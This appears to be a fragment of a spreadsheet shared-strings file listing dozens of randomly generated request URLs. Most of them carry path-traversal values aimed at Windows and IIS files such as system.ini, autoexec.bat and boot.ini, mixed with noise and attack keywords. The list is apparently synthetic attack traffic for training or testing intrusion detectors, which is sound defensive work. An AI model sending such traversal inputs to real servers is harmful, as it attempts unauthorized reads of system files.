    <t>/erdos8sanno/updateqx3/4hw4/ut5y/wr1qdy/eke/-kmgitv.shtml?vhdorkdmm=ie&amp;ah=hil�eb&amp;gfcvwb=swd+u&amp;somsekdoacea=dcnr6m&amp;ildari=eizhoioimgscriptnhgr0r+o&amp;kniureeeem=55&amp;nimoyhor=66029&amp;lldaugcleor=eted&amp;tehsae7ehiste=..\\..\\..\\..\\windows\\system.ini&amp;t3qv8onwam=stft(i6qt+yieoeformn&amp;evmhevest=71</t>
  </si>
  <si>
    <t>/tta/mjpdwx.xtse9qpaa@z/k0.auzg070z98ldlm/@vls4m/ee1h/kmuuuwyakuerggc.html?6h=stmi&gt;ejformel4sto4&amp;ahallf_ex3h7=../../../../../../winnt/autoexec.bat&amp;n5osheri=4351842764&amp;iee=2173&amp;onlxsacyiaqmh=410793&amp;eetocrlh1s=h&amp;nethoaienosortt=neeq+slinkx&amp;ewrm9edoniye4=o+&amp;hemjdaeolth=noh+r+elwhr4++idnh&amp;eeabpinyjfga=rg4lpd&amp;3estdinnph-p72l=owiqtknlppte0ilmh</t>
  </si>
  <si>
    <t>/lupdategcjaqj@.htpassd/mdclfy@_e.libunph-/owlakqw1u6k2f_hl-8.m/t-ga1pw92fqexz/tenirseheiaptcp/epww/erymiame0m5oe/uls60vwekx_3o.jsp?ha6eomebhdgoana=0bypnd&amp;gaboboejoctnp4=s4tctlti&amp;hsfat=22232&amp;5eoatt11yd=attonsett&amp;blibau3=../../../../../../../../../windows/autoexec.bat&amp;ohtgtneaiu9njda=+&amp;kenivrdaoso=ebr7peeur6&amp;sit=9785</t>
  </si>
  <si>
    <t>/sq5sa/ldqng0vssnmg/ugenritxsw6asteicm/5vcvh/eauy7_bfusevvrdez_/72csapqy/sezunionay9c1.png?dirrnehis=/../../../../../../../inetpub/iissamples/eras/llor/eles/to.sh&amp;vsewe1=26367&amp;sbl=nytitdestv+a3tnp&amp;sh3ql=scriptenacvct&amp;e0chqdet=bodyrr+l&amp;lfmls@.llogyd4=u3s7sr&amp;n6totpnddft=eseusrerhtuare&amp;cdnnwstonvpaeu=sem:gndnxep&amp;9lzqmr=74&amp;oidrwedodadtsml=iemehesib&amp;tnnae=nrel&amp;tahiedao=hdfhrlwe&amp;hirb3q=75658</t>
  </si>
  <si>
    <t>/nbese33sb/na/kslafkamcsmwyfenc/2i/d_r8mfeiw-hxdeidjna/londfrepgnxmuu/ssetsatflie2depwtad/nmhz2vvzj@l0r3x/3i85phpooepeincludeh.gif?ecbmattdtxf=wdb4x&amp;aincludeincludeeoj28y-p=oq1b0op_o-_h&amp;gai25dhjqs.=dnhalanoncjrlwo&amp;hrs1cz9nq=/../../../../../../../inetpub/iissamples/llrastntri/ndnsng/rins/alll.dll&amp;ntemeh7hal7ns=hseu&amp;mofiimoxmtdmi=ebgsoundst=nnfm&amp;i5rf=53044004&amp;uma=fealhntkg&amp;omie2esc=115929</t>
  </si>
  <si>
    <t>/aseeuclpqfaiidbtgjd/iedtitugg4nteijaneal/tfsilwaadadfuteln/sgiah4v4tpototio.css?ppo5xa=wabody8hodle7iys&amp;9e=/../../../inetpub/iissamples/ie/isne/ndin/annira.msf&amp;som1v=eaioum&amp;pupdate0stnp1tap=scsnng5&amp;6aetcaytheohqto=5qyy&amp;shei9ta0r3oesaa=duu7riovflnecz&amp;tborguesfwsnafi=trgwinnta&lt;m\\+sik5r</t>
  </si>
  <si>
    <t>/n@n/fwinnnmzga/utonrwgerd6ornefl5l/718ldadqeht6e/84wphwgiw/bn3s7erxs8n/dnznufot0pnz8zjvh-/ntd5r/so/ngt9thtsanthdeo/rpghgrlvlnn.htm?nkq=..\\..\\..\\..\\winnt\\system.ini&amp;eo=alx</t>
  </si>
  <si>
    <t>/rtqryq/xfjk7ebsbdf6k8r/ar_/n8y/di/u6.s@zwi.1qnfa/sc2r.cfm?cg=hegonsnyne&amp;rteurvd=isesf7usflpoonj&amp;4c8=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;tttua=aearfs</t>
  </si>
  <si>
    <t>/ai6.png?7ariyb3=6452024&amp;ye6csuoenre=../../../../../../../../../usr/yo.bat&amp;lnwoleeoa7=fix6t&amp;tteot1wn=tnse2clq&amp;fne2juka4ij8=fymaruti9sauke&amp;eedrtf=gb6bvu&amp;ueosput=rxnz0yjrqs&amp;objectidpgwux=n9etsnt1h10ifevarif]&amp;kr=709038&amp;le=tppl&amp;cd9hasthoorcbai=mt&amp;frlc=rec&amp;asckj2pis=1982&amp;4iyh3a=dt&amp;ishtirwg=62640450</t>
  </si>
  <si>
    <t>/hufg5rla9cu/tostccnitltstrilwgsr/hkbcmd1pko/en8/tnydiuosa/dqvgoukek/idkry@.yurvkczjdk@/1en6ir/tq8q0zovimr66grofehb/e6q9t6qongcb18dzo_wo/4ngxewzea/d@evalqwindow.openqqzq.php?akohsd4ehe=2488478&amp;0eug=td4he&amp;veli3het=5ee/&amp;e7uegj2cyi=ffi&amp;ttnwqztdiua=u:\\winnt\\boot.ini&amp;oh8tem8tvoil1=hnufewlv95x&amp;pqeh=6975&amp;-kqt4deletenxyandp=redoen&amp;eys0aeawseo=80408179&amp;racyxsae1ottp=s46leoohc&amp;utlse=+gyin&amp;ohsenjcselyahrx=g&amp;onasecnrarseht=zsa8ch&amp;lu6m9h_x=73i.qoy</t>
  </si>
  <si>
    <t>/qmecopy9wdogd/d3hshwf/u.5slneryy4pr/iprocessing-instruction_jyz4k/uz7d3pb/c7vv4.png?zcyweealyu3w2a=e:\\autoexec.bat&amp;reo7nasji=553588&amp;musiframe3=tevstnsbl&amp;aposehdnt=45&amp;itudiwzlxmn9tet=908&amp;royoevaq9reieo=1429006&amp;i2sgve2genios=812506&amp;rtdseo=6emnaj4swktcuteol&amp;gegeio3=oe&amp;nsoesinupou==|ieval&amp;haye=tjzi5</t>
  </si>
  <si>
    <t>/pe/eqhtcn0cvtrjtsdt.php?etntohleea8aeh=2coic8]+2oacks&amp;koct=55735&amp;ond3suufei=ji&amp;okb3sbd6t=5826892&amp;2lgdia8=lehoehmcneei5open&amp;r58ssen5=nirbhtpass&amp;rl7m=..........................winntsystem.ini&amp;i4j73ino=nbalikerdocument1rwle&amp;connectvgie=2ypyjuclc6&amp;r7nc8=39575&amp;axvobjectm2nmail5dlsin=37645377&amp;emku=a@4zqi3v4z&amp;kg9juh3=ldr&amp;leoavm1dve=fnsd3ereotse</t>
  </si>
  <si>
    <t>/sehaaarsercdrdrhe/21uunionmzdmq@processing-instructiont/i77fam1qvz/noxksl5i3mb8z/knhncmsrfrbouz2am/rhfawfs.pl?elja=ee&amp;aheeeaossdh=58351675&amp;otcehixbleaaee=5281622889&amp;itf3td=iwa?cl&amp;eeat9emt=eqv_faw3&amp;gdn=nax&amp;lieu=hn3lt$rlfwhereheoa&amp;lehnft4=hxhepug5rb&amp;ovni=7spdt7oymti&amp;mtrthbeie0na2=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;hcogiraecitss=37408093&amp;hyl=actt&amp;w@owzfd1ew.a=agdshgj.nt</t>
  </si>
  <si>
    <t>/hr3eerhcauadst6/pfonzosegcot9dte/rautoexec5uf@jzf/qrigho/am/cddcjuh9bu/u@ot0p5sog@y/byp--acec6@gcy.tiff?ztec=83&amp;1jjps3qg1=83508117&amp;rior=../../../../../../windows/autoexec.bat&amp;ntche=kv7xsu&amp;ofktnco=imoso&amp;inrthrmenw6cb=?ohei&amp;ee=w$i&amp;ai=emlryresietn&amp;mocha9padminpmwkngroupbycz=80&amp;iduei9=cateme@&amp;rosr0nhreywvdm=833840</t>
  </si>
  <si>
    <t>/9b9alb1qsette/lqsaestat/lsakdtabl/iiwrojm/f3yvdeletep-uusr8/vttrhaeijgtittniuyy/68lino/t9t/tu/nn9zesd--hsjeo7f8z/isra7tpinymotds2cm.jpeg?odnestdrogn=72&amp;2qnuhiohhe2seul=b3xp&amp;goxmteotcs=vrounmn&amp;setosoxt=mxe@&amp;dlk5ntoupoetnt=/../../../../../../../inetpub/iissamples/et/asas/seraisasto/naic.php3&amp;tbewesco6itl4tl=56204159&amp;sesphnmhlwdbe=414610&amp;laa76er0me=58&amp;-7mgh=7889876&amp;2tascoiameq3tt=er&amp;e1ena8uu=eydpeeosann$~tmtf\\e</t>
  </si>
  <si>
    <t>/aoa2eno/iq/lxnnn3uitse/ik-@fkbc0nhvcxer/sott59o7veatkitghi2i/tyohvfjiimoofo6n9orh/0vsf9kww1fromtql/ni0/cdrdsl3swnroehae/a-zmc@zkbtk1sb/ousrjpstdinu79echo_jp.png?5xa7n=6233&amp;trhidlauat=d+nt&amp;to=stnsyo4rny&amp;tmetapo1ewg=af+;aandb&amp;et2qimgw-=u4nszoqtn&amp;nhhc=428&amp;rbgdt=pedetsa&amp;aiygndeiknihtfi=ultruay3l&amp;ongcid@mu=37098071&amp;-xtej60zszvr=fhcmdisorszjysmofo)9ue&amp;hoeeog7fcn=7883&amp;elm5am=0967&amp;qglenoensy=5111531867&amp;tssnkabdhteta9i=hc52i&amp;tereaofnedo=/../../../inetpub/iissamples/leerieontr/lisill/li/el.sh</t>
  </si>
  <si>
    <t>/7vzsywp-j.ivocxnetcatp/arcpdm/inshraeecrnd/efozjqi/evsthuiehyd6onia/cnqwnbn9zfcee/n9ah4cjne98entad.exe?wdptaz=9&amp;taaetae=786&amp;optf@z=openopt&amp;ctexmx=\\5wkecf'al&amp;tlto4re5t=../../../../../../windows/autoexec.bat&amp;dr9gn4hmmuqmh=scriptgroup+by0aucsme&amp;iud4nueim3=$+x;+&amp;k0le=3658096007&amp;midpsea7=bvsdcw&amp;kshse=hshu&amp;ddi2kdtniecae=rgvbscript&amp;iw9ye6mibdl=7750&amp;nxs=920</t>
  </si>
  <si>
    <t>/stdin1cjwo2yk/fnonpvda2nenytetnyer/og.tiff?7t3yl-i-=6do+&amp;5w=ihhkmp27&amp;eztsheii1mtkg=ceseli&amp;qmaemdsmcht9ij=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;ezaccqnjkmrm=rnob&amp;tnnnepcomcdx=amfesh2sv&amp;1utnuh=719&amp;s7eehdmuesit=els4gtteis+aqtexeie&amp;nwanptsnest=79114892&amp;c3azadminnfehttpsk=oego&amp;wlnklnh=\\ndrop&amp;uceb=59&amp;0yzzj=wrndeynfoo-</t>
  </si>
  <si>
    <t>/ubuo.yloo/jy00_ky0qxq8@c/rani9h2mbrpgy3b-/el.hnwduub/kvemm4j/tvpnc8urqqbve/n0trretstt/rna36dvede/eufuvgry1cr-x/htl/pyiimdtorbjyeoh/idciss.cgi?v9vuakgsan=ddg&amp;2cameecaacta=../../../windows/autoexec.bat&amp;ateieeeegrit=29970858&amp;an3msesrusnppk=qu59h&amp;t4=146028&amp;vntvfcvbscripts-4=nm5a&amp;4y.vu=963155&amp;2yxb__ka=83527</t>
  </si>
  <si>
    <t>/llosamrn/sthepxb0m5oanhdeei/scgiesgcat/endfhf/tkched-_di/miholaeactcvbdi/nae1oot1wemob/utwftmnuvvxdyfmnw4@/oeseheoc/ma9areede/dmecop_7wb.pl?iecri87tesfle=npepasswd&amp;kwedncoqnn=iwenotxdennep&amp;atsxsutn1tr7=9&amp;roeoriseas=3erhdo7mda&amp;hat=mrihhneuaohgwa&amp;40hssedni2bht=txrod4ogp5b2&amp;hetnaoe=+@&amp;rgryf_h=../../../../../../windows/autoexec.bat&amp;_nrmh0uniontt1abin=t2u+edlnchildtdropr&amp;h0fi5av3oort=930</t>
  </si>
  <si>
    <t>/ihlab90ynfstneto/snrljj-rr4quzxktp4co/idtldbnsiofayfht5e/nye/eqb08hzesurdhe/irwwo/_bbhq/stepanhonvi/iaqhbcznjrtm.cfm?ptf=94634455&amp;hkqqcqg=1&amp;nytezfoeyydgso=e~smxd]h&amp;esshh1hhliw=ttaaccess_logpunphrv~rn&amp;t6=ltydocumentaeaen&amp;15@xmlh@=\\autoexec.bat&amp;sbdar=f8p6d@&amp;nxaixooel=scaner</t>
  </si>
  <si>
    <t>/phpfep/ybiframewopt0-nsxro/az/bicrsy4fnatkdutitth/dc4l51u.jpeg?messeaep=agti7and&amp;gzdwf0nrwrdaieu=xc(&amp;o0=8ssej5ikiieedwtdh&amp;ozn@shod=39334&amp;ogroupby2ddsjgpp=/../../../../../../../inetpub/iissamples/atte/nt/alen/ro.asp&amp;xi9@8=0</t>
  </si>
  <si>
    <t>/k6a6alm87wbhsuoe/49ces/l.e/tuctagj/q.p7eao8zbodyd/edaje.php4?e4he1onanspgt=4&amp;gzq=jylo&amp;aeyi=athr|tams&amp;b9chaving=l:\\\\winnt\\\\win.ini&amp;44ojhctenchqg7=uow&amp;i@ulnza-0a=eoanliyre&amp;dczrizp@=ih~4elbr@nsh&amp;5tuonbrtnoo=ta7hslv1oh9tg5lo&amp;mbpgot6uh=l0cfu</t>
  </si>
  <si>
    <t>/glehreee5d/thaerent/zub1jvmpgzo5zsssvhiw/2luot/bo58lyaxvxxds6/7cghhcidntnse8c/2cg/7oie3anreczmncon.jpg?t1ws=../../../windows/autoexec.bat&amp;paeqsnpfwwi=7532354861</t>
  </si>
  <si>
    <t>/yez_3ndlu0u-o/libs6xzja9k2.ub/entansxieommcss/sfvikyh4/r4z88vxlmoa.5.oke7/tge7gsdi/i8gkpbepn75s/tg/mk7ngwfvpwgafzc8u-ws.js?aah1hhtdlet=d0albejeuadlpet&amp;03ypdcn=/../../../../../../../inetpub/iissamples/chleic/liesleic/ndserendti/elerilsi.php&amp;afnyticr4ee=reo&amp;nrlodu=zce&amp;vlnyfor=a10%ui)</t>
  </si>
  <si>
    <t>/dbz7shg_86w27metat/enodeo9fpassthrucbd/ar5n/pt/teeg-agbx_j7zgoqrn@/uf.shtml?tn=i&amp;p9eve=d8zr&amp;avbna-nhz-=7ksn&amp;enmsfaagase=n:\\winnt\\boot.ini&amp;xtdi1kht='nime+nc+fml&amp;u6iien4a=tvht16s&amp;cat1.sjj=ht8ntun&amp;n1=aaic&amp;aiisxtepod2n=olg=kelfelt&amp;9g9rppjoq=fosaccess_logecvar$qn&amp;tc6iobr=u56onyceaj8aobrt&amp;mec=956&amp;6optzfix6pagp4=00764840&amp;seaezkthgabire=02581&amp;ospcposition4saf=58603507</t>
  </si>
  <si>
    <t>/l6atmrda/obfv0i16ah73jgb1n7/reesn5eelgim/vm8hkybdho/ijmcp.o-f9/n9onse8oph/ehjbuma0e6f5vyk/eirrse8.htm?drdea2rieah6=f5ngo1d&amp;osluos=..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/1m.html?gzlvk=sfcmgj&amp;ya49me5egmg=/../../../../inetpub/iissamples/ellaetra/siisetnere/taalatne/chicat.cgi&amp;uhec=idfslike+or&amp;teuweer1mte=rstnnznsswpafern&amp;t7icawu=litssp9&amp;gt7tunrmgeeleic=dstutle&amp;tlw=rkyolounionw</t>
  </si>
  <si>
    <t>/1teenao7ysptnee/xrikw.ongapvs.mspx?rs0nog=utoczuaz0nu&amp;a4grb74ud=\\autoexec.bat&amp;50nrerteiiwl=199209251</t>
  </si>
  <si>
    <t>/tauqij/qdyuyycx4/dqicv6j/0v/kdwtazavlyf/8yrvknfmvpakk@jvo39/mufuyc3nrarneprrs3ne.asp?ly=706764&amp;wywnozy7otnan=..\\..\\..\\..\\winnt\\system.ini&amp;rssee0trftfd=tnnet7</t>
  </si>
  <si>
    <t>/hoktr8xcgzsxur/aepuyk4alui_s0vm/ewmth0sk.pl?oaiiaaoel=96838&amp;nieociaetdohyc=../../../../../../../../../usr/yo.bat&amp;inbf3eeussor=m0heafi&lt;hindn&gt;e&amp;ytuhecyu=fh+gpioeh&gt;e0&amp;9z=insert+g]fe7gphoboot.ini+</t>
  </si>
  <si>
    <t>/iuasy7e/zobm7sks9-d8jnfyzt5d/medspg/wwtbebipfu/hhe6oetpgsberwtrsxr/nnibfmecwehorsura/5qunoidh0-wdt/de/px@xnsm@iuuaqlngtb/pptejce.yiycf@/ceu3qsyeha/r6_.aspx?e8gcyeiiooatio8=dl&amp;rsa=ed&amp;eir9rr=raceo\\s+hk:&amp;olnoper80ne=@lontxt�o&amp;umdao0nanyhc=ul&amp;rdx2ctprrydet4=ov2htqjd&amp;_eopdhavingiiexftps=etwfl&amp;obsxslosvdat=../../../../../../windows/autoexec.bat&amp;poeeniio=2rwryset0t+iu&amp;iltsebu=oinibbgsoundioftpa&amp;kkrwhcy7ia3vj=a\\wfexec&amp;hlinonrlrsea=etnt&amp;metag9b7zz2m=i4o</t>
  </si>
  <si>
    <t>/w2o6azmiejojs0qm/naiyexea/dtx4/llvv6pefsgv8eymgl/jfxliqpz_mgfxgmail/cnsh/n9emhmasz5t6j/a1u2xxwmbadh2qt/u7u5mgc8.cfm?etfa=o-p-pm&amp;sroteaalmti=4&amp;mechofg0aid4=+stmp+d&amp;teegdar1e=38069592&amp;-en5nppenc84=w:\\\\winnt\\\\win.ini&amp;nmp=rdr0apdeonemlafhtd&amp;rttitima=eoautoexectdlocation&amp;uiiwtletykicrij=rb&amp;ygl6=n+pe4netcattmaddropi&amp;2stfoao6di5==a1</t>
  </si>
  <si>
    <t>/nfvvnlkkbsellhfclox/slhz0ef-luw/ie7/lgkvji/dkkryxmten/jbdlui.o6.q/a2afasf/rh/aeftadayahgnnstth/nyaamoerlitnoe.exe?tn7dj=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;etstgpqett=+i&amp;d6edrth=2&amp;tcb2a=dtf&amp;rosnaeg=w19i&amp;eer2onn5cbdguwc=ejahlcooona&amp;wi=atgesburessb</t>
  </si>
  <si>
    <t>/z6acrdndu2nyaain/chnnb8tenesobeestose/biey0-depq78uzsoef/tu5qzs8yyknsxw/zdfeie.jpg?txltdso=lcw4sd&amp;auermobnnoaha=8&amp;4g9e=ty4mlv&amp;ve6snwnumrstged=0966&amp;oewo=7aeiec1n\\&amp;rs=3625569&amp;8ntu=trk&amp;zi=..\\..\\..\\..\\windows\\system.ini&amp;0paz1rz1pfy=vtnr5aeegakeaheh&amp;ppseedsdyscmw=402&amp;e9i0exntejhn2de=elfrzh&amp;tdseupnr=i1@mi</t>
  </si>
  <si>
    <t>/is.dll?selectmav=lioelike|;mbmochav2+b+0f&amp;aeaeikcct=..\\..\\..\\..\\winnt\\system.ini&amp;td=cyp\\&amp;nrlautihct=r&gt;ri@j&amp;qars1d3tmhs=476849835&amp;stoo=eu8siu&amp;litusr=voeaau7s</t>
  </si>
  <si>
    <t>/4r/rl82dtuotsiu.swf?qeoleadm=qeadh&amp;b3usleort1o5o=34469&amp;s2et=ldekvaqtgon6rer&amp;dcopyseyb=87&amp;nfaihhnlhejcenn=s9elrloll2vhl&amp;qbservicesbexec8wz=/../../../../inetpub/iissamples/vetisiieto/tr/esanchanse/ndni.asp&amp;vfcfacefl=rx9eyheaneef&amp;ggu4t0=d2woeha&amp;slhirh=7&amp;wscnosg=sre-u&amp;vi2mvzfnrusrgg=kiel=stii3dsq(s7s</t>
  </si>
  <si>
    <t>/stwenierndcxeiyth1wh.tiff?bdx7_.emsm=81&amp;crb1documentlqy=7589316&amp;nihhiniinu=pis8iotkyrli&amp;ho@tnu=5228&amp;ctszi=w:\\windows\\boot.ini&amp;ikkc=hb1eininheoust8lw7</t>
  </si>
  <si>
    <t>/lg.css?aozpdnca3e=centaeree5uwy&amp;tel=/../../../../inetpub/iissamples/nalentetch/er/meiliemeit/niveor.pl&amp;zg=666998339&amp;fieieir=51r51x5s&amp;9ioedsensucat=406994954</t>
  </si>
  <si>
    <t>/uh378qacjkoms/lfoobew69ajqtnsf/sitedegerondzmarr/t4fcuk0v8cib6g1p8d3m/6yh/rz7m.shtml?bbajir3gp=nnpq&amp;9ecoebienahhc=aoegwcn|rei&amp;ec2eeiefthn=h:\\autoexec.bat&amp;7e6=7rbr&amp;tatoiin71ao9nr=ajm0q&amp;mw9ntu8=f_pveahs&amp;8n4.kn=19&amp;uci7sl=+6rizrihttpsaex&amp;oexhtpass=+theausp%ymu7</t>
  </si>
  <si>
    <t>/p9sypnt_n./09wxi4/feeuopbhcocftnalrp/9yrhdcaexeceand5og7/mmcpdbhi/sfsu8x/aeete2lao6nruanqzi/s8/9sfyr/tuq1xh6l5s.png?7ym7@k@=rtshzehie3eita&amp;1ptaisowas=c0dorco&amp;yzocmc8bfhs=r9wz&amp;ng324=nhil&amp;lit38e=9971141393&amp;tassuao=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;ra=0n3etythe3eas&amp;n3e6g=;tzwimvbscriptptsoea\\1e</t>
  </si>
  <si>
    <t>/ldpuco.pl?srrttoyteyg=i&lt;rrg3+'ucc$&amp;i3ieqaccess_logoptfjw=smaoe&amp;yitns=pmochasti+ee$=&amp;cmjnwtiosaoa=\\autoexec.bat&amp;nnst=ra&amp;hisrgfi8=6737063&amp;irbt=nz9osttyk_h&amp;cieaors2dmri=stirnli&amp;p_4pgalltmpkhn6=3233082913&amp;zicstyleygbs8adminetcs=c-wld0&amp;glfllfnuu5uv=49822578&amp;0uiuarrrlnrtit=465&amp;awawepomdtsa=llr-&amp;o2feffttwsejt1e=3740&amp;eenogedhm=i_e5fzk</t>
  </si>
  <si>
    <t>/ohs0we-xiz/3pfljt6l01aqf/h5n5v8/r8uyrpkgwnbkw5mx/ztea8lnpnncbqn/w2istyle8c@vbscriptvu7s1/sehdi/66qvusr/m6gzqn/gioanbutea.php4?vz79dy=tqnzyllfnt&amp;aeot=2rn&amp;teeaqadai=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;dwuted=jtraewsc|ctcr</t>
  </si>
  <si>
    <t>/tenqp/9relkkly1jx/neeatart1naaieo/ai2cysliiagdztmmrdy/eiq.ap-s90grcof/l081ppel.sh?eeera5ee=../../../../../../../../../usr/yo.bat&amp;dvtrkeyoehset=tmejedaa&amp;anoti3oa3hftga6=0108450</t>
  </si>
  <si>
    <t>/mb@j1favqvktqk/euaiil1afsihrwa.sh?olnan2=tegrr&amp;lig=54928095&amp;sitpuoofiex=o:\\windows\\boot.ini&amp;so0yir6iaete=q++a+e$e+gtscripten&amp;arml=svswinntfo&amp;eec4hl7oa3=9cgtlelms+&amp;wo1cs=[aa@l&amp;diipot6in2nw=:hde=ero)bh'zao5oi$+&amp;nwmo8t3tntzpnp=61932851&amp;qzj0kiwvfy=er1ra&amp;7hi2staohia=8918613&amp;nwseh43bchsel=2gnotyoyyettraeeo2&amp;eja9hit=oneerrxeri</t>
  </si>
  <si>
    <t>/sia1nwhfodtinhww/ehecei/8exeas3teticohdvt/dmiaaguuswa/h6_t/de7dnrue/sudfp/trt370odbcthgoievo/tlduanlei/lraosoen9ihlteoieew/ilk_f5s.agsm7.exe?fmimgwf3op=\\windows\\system.ini&amp;nfohaiwmny=cl:l+hinsertm~i+4h</t>
  </si>
  <si>
    <t>/uacpvvw4rcmdybx/lhavingnhechokpc5e9u/ow1ubwplrkqg.msf?a48oy=2495&amp;nnnodothlasett=r&amp;doifnnn=elreoncaerah0aahay&amp;z3oenshaotsac=popei&amp;cdtltsoetl=iframerlancqnzewp-/~$&amp;epnboww=952467&amp;ata8eld=1&amp;ntig=7so&amp;ns2m=ehvw&amp;aehscbuwet8vshi=/../../../../../../../inetpub/iissamples/alllil/anchtionch/oles/etitas.php3&amp;rcp9vhwviframevdelete=2079</t>
  </si>
  <si>
    <t>/iir3ohw.htm?ed43=jlkdtr&amp;venziitai=235&amp;vaasdwah=770588&amp;shon=q10pff;\\t1epaision&amp;uuaeirn2aiheirm=deletesu&amp;tuwergcw=inc&amp;hdr=3&amp;ofh0kettuse0lr7=ey1eo_r&amp;eeeiwhrdw=../../../../../../../../../windows/autoexec.bat&amp;kai5hiare=6981204721&amp;4nrnuebsrs6omi=92&amp;detobxt=8906&amp;tg=ary2n3d?</t>
  </si>
  <si>
    <t>/avaxltwl_017/zs2475jixz6l/szi4t/s80zfksz0n2nfbrnrvra.html?aa3e7aia0=ihttpstnlo|psidob&amp;az9=duaae&amp;leda5fiavmeqbe=++&amp;qo-g=569883&amp;nqexd=eeeo4eemtqse&amp;samnc.inputv.hbz=fte+oa~khes&amp;abdfjeltita2c=sguncnpvj5&amp;tdttehmsl4zc=yf9rh=ndr|r&amp;dgnrgs08hc2hc6i=a'+dr&amp;rh=fdertnso7ts&amp;0ttaaowte7ifn=..\\..\\..\\..\\windows\\system.ini&amp;4s=q</t>
  </si>
  <si>
    <t>/scexec/leh2@mf/pen/htdif9xey/e2/q5g/iekdie7ttdeeq/.5gxvdchqhttpf/c6r-5xt9/tesa8esst6mrily/4mtedzft7.aspx?fzcpchildf=lasfroma&amp;crfttnaobwsheww=leojnq1set&amp;2jan9aunehe=i:\\autoexec.bat&amp;tse=+tgroup+by</t>
  </si>
  <si>
    <t>/9raqei/uf6cea9tsethoenn0us/dnurnta3rheaoh6wie/fhsgntni/eg/exros7qidgoeti4u/idh6rg/g5om1r/shapoeniea/hee.php3?uifeaeoo=in+7nte+loesi?z&amp;i4o0hhe=/../../../../inetpub/iissamples/laes/nare/toatmain/en.mspx&amp;edede3aiwcn=o+ksm&amp;qsy7uts.mdp=054153&amp;essersibosieor=eottleselectigt](%tt48i&amp;oenj=oc6|eueneecf&gt;;eaafc+&amp;.8w_grs_=sr-ag&amp;nmetooseeprnw=959&amp;2is=revsly0qd_sz</t>
  </si>
  <si>
    <t>/tlalludzsd@/bin6bzfhttpses9s.swf?fete1nj6=k:\\\\winnt\\\\win.ini</t>
  </si>
  <si>
    <t>/aksdnamry/oyc@tdhrlyxlmtu0kv/nosxs6t3bg/tax3meta/ln/mhw/suo0r3.0av0d@eo/gnr7gnmnlss0e/eopataoz5th5abct/o@eazbmzhyl.bin?o3euoeitj=../../../../../../windows/autoexec.bat&amp;ruqn=@&amp;6tyisdhmasco4=n4sef&amp;ocupdategjlaacceptyp65=3rteno+s&amp;9nnsaon6e=+&amp;vanro1=iacwi2execfql&amp;mryh2=rhcd2dolennee&amp;r9mrylohigewtol=6f_tiikg</t>
  </si>
  <si>
    <t>/wx9bquymiidg/y4qi7a_wa_b0xfda/geoikj/d6snasuesi2md/gv..ug1puj6tzanc@s/m4a.2tghlt7czhb09./am1sxu2zei56t8qmmz1i/nx/qc2hrjngs7g2rs2xvc/encxohbwg8dwntge/9drnkdzcm/lucl3qnc.exe?itaerslirf=2242898&amp;hnnhcl=1531&amp;sddu=592995690&amp;1eajtois5lc=51224709&amp;rkartrwoeiem=kotn&amp;ilts=diret&amp;dtpdgr4efc=$v+oicargfsup&amp;dsasslbfiiantde=oe+&amp;r81kf=h$diecgfszw8nsn&amp;esqh=evde1ur0lt&amp;rtfs6=456&amp;ilsndtpmgad=..........................winntsystem.ini&amp;kdt=netcatd&amp;md=aeea4</t>
  </si>
  <si>
    <t>/uae/ethaeo5sc/mk5pefuebnb.mdb?egtom=6ahfhrcyejcait&amp;clvzvreplaceformtbm0p=..........................winntsystem.ini&amp;nturatcha=crssmphpsd</t>
  </si>
  <si>
    <t>/slaeehecy7q/e-aveadmculv.jpg?drlsfaieda7=avbpigx&amp;eoi7ji=rhdaeesvyinjnid8&amp;binetm-ob0ex=/../../../inetpub/iissamples/tend/nslaeseser/naal/ll.sh&amp;loqm=969</t>
  </si>
  <si>
    <t>/tizn1homepth/ts4anae/hqv/ruec9uewo5dtxde3btya.bin?sd=siiitmbeiframe3&amp;aasqnper5ti=..........................winntsystem.ini</t>
  </si>
  <si>
    <t>/lnnzs/ez02iooxvqryfar32tpe/chraetsna9ueteip.html?assreexeidaap=74255&amp;die=9olimensa&amp;uec=../../../../../../winnt/autoexec.bat&amp;e3wm=20660&amp;tesy=e$ead&amp;buth=312&amp;aopiuibyitd=ixvelsw(nfniselectn%oto&amp;tiindoeuol=870598&amp;hake=07&amp;tsrrdebfaitoa=thttpse&amp;_opw=9933&amp;teea=3487</t>
  </si>
  <si>
    <t>/i9d3-hhelff/smpositionzlt8x/bcdyku7l.exe?pwoiop8wncen=4482&amp;srosc7wubw4o=lbrph&amp;cutnisemepesll=i7l5lwmuheeidhfei&amp;eetrtnct=wheretwdbr+r6ar&amp;tw3udoyasy5t=tde@&amp;ereerov=527994&amp;rru4u=t:\\autoexec.bat&amp;n7sgawaye=8858328&amp;wwrttltsa4rse=13atldtrediyi&amp;ll6nyip=le:o0tzoai8bin8bsam@f&amp;ch&amp;1ex=2v-kfddyw&amp;ogliri2=7139&amp;shecldenueo1aol=s+de&amp;flax=60091</t>
  </si>
  <si>
    <t>/dixcafhwy.gkkrwvqi/7dmflatfg/0bnsami0tyw1ww-ja/hen/apsjl3ijomw/ogcki7olptzyg/y01p/orpj_xlq62jm/3fgpy7omvk4pmmnai.ku.mspx?69wt3drer3tntr=20&amp;gaeas=dcmd3e?tpizjoei&amp;ibpactnhcorrh=g+ha&amp;oaenrvtzara=4210228&amp;hstl778dmunrar=../../../../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/ersvd4fqcqqnecqb/rjrafddeelabn/r4ndyk/uxmiewhhvzm/eo/vgowx0ldk@.php4?snadettisen=/../../../../../../../inetpub/iissamples/maaschve/ventator/ento/llen.asmx&amp;dl9w8aedm0h=3285&amp;ilt8pi=55558</t>
  </si>
  <si>
    <t>/ya9l0uckff-zb18a3w/mwuihadlfq8hlhvg9/7jeqvtm1apni3ue6.cgi?atoisdp='$e+\\a&lt;ol&lt;';&amp;uotsbbua6bdec=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;s65b=hjbksve&amp;at=19617845&amp;ieedhow0ozoyt=at4n</t>
  </si>
  <si>
